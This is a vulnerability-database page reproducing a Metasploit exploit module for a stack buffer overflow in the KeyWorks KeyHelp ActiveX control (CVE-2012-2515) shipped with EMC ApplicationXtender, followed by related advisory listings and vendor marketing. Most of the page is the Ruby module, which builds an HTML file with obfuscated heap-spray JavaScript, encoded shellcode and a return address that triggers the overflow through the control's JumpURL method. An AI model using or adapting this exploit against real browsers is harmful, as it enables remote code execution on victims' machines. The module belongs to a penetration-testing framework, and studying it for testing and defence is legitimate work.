Lucene search
K

EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow

🗓️ 01 Oct 2009 02:13:16Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 23 Views

EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow. Exploits KeyHelp.ocx 1.2.3120.0 bundled with EMC's ApplicationXtender 5.4

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-2515
29 May 201815:50
circl
Check Point Advisories
Multiple Vendors KeyHelp ActiveX Control Buffer Overflow (CVE-2012-2515)
1 Feb 201000:00
checkpoint_advisories
CVE
CVE-2012-2515
5 Jul 201201:00
cve
Cvelist
CVE-2012-2515
5 Jul 201201:00
cvelist
ICS
GE Intelligent Platforms Proficy HTML Help Vulnerabilities
11 Feb 201207:00
ics
Tenable Nessus
KeyWorks KeyHelp ActiveX Control Multiple Vulnerabilities
26 Sep 201200:00
nessus
Kaspersky
KLA10300 ACE vulnerability in GE IP products
4 Jul 201200:00
kaspersky
NVD
CVE-2012-2515
5 Jul 201203:23
nvd
Prion
Stack overflow
5 Jul 201203:23
prion
RedhatCVE
CVE-2012-2515
22 May 202512:10
redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control
        (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's
        Documentation ApplicationXtender 5.4.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2012-2515' ],
          [ 'OSVDB', '58423'],
          [ 'BID', '36546' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
        ],
      'DisclosureDate' => '2009-09-29',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME',   [ false, 'The file name.',  'msf.html']),
        ])
  end

  def exploit
    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Create some nops.
    nops    = Rex::Text.to_unescape(make_nops(4))

    # Set the return.
    ret     = Rex::Text.uri_encode([target.ret].pack('L'))

    # Randomize the javascript variable names.
    vname  = rand_text_alpha(rand(100) + 1)
    var_i  = rand_text_alpha(rand(30)  + 2)
    rand1  = rand_text_alpha(rand(100) + 1)
    rand2  = rand_text_alpha(rand(100) + 1)
    rand3  = rand_text_alpha(rand(100) + 1)
    rand4  = rand_text_alpha(rand(100) + 1)
    rand5  = rand_text_alpha(rand(100) + 1)
    rand6  = rand_text_alpha(rand(100) + 1)
    rand7  = rand_text_alpha(rand(100) + 1)
    rand8  = rand_text_alpha(rand(100) + 1)

    html = %Q|
      <html>
      <head>
        <script>
          try {
            var #{vname} = new ActiveXObject('KeyHelp.KeyCtrl.1');
            var #{rand1} = unescape('#{shellcode}');
            var #{rand2} = unescape('#{nops}');
            var #{rand3} = 20;
            var #{rand4} = #{rand3} + #{rand1}.length;
            while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
            var #{rand5} = #{rand2}.substring(0,#{rand4});
            var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
            while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
            var #{rand7} = new Array();
            for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
            var #{rand8} = "";
            for (#{var_i} = 0; #{var_i} < 4024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
            #{vname}.JumpURL(1, #{rand8}, "#{vname}");
          } catch( e ) { window.location = 'about:blank' ; }
        </script>
      </head>
      </html>
      |

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(html)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation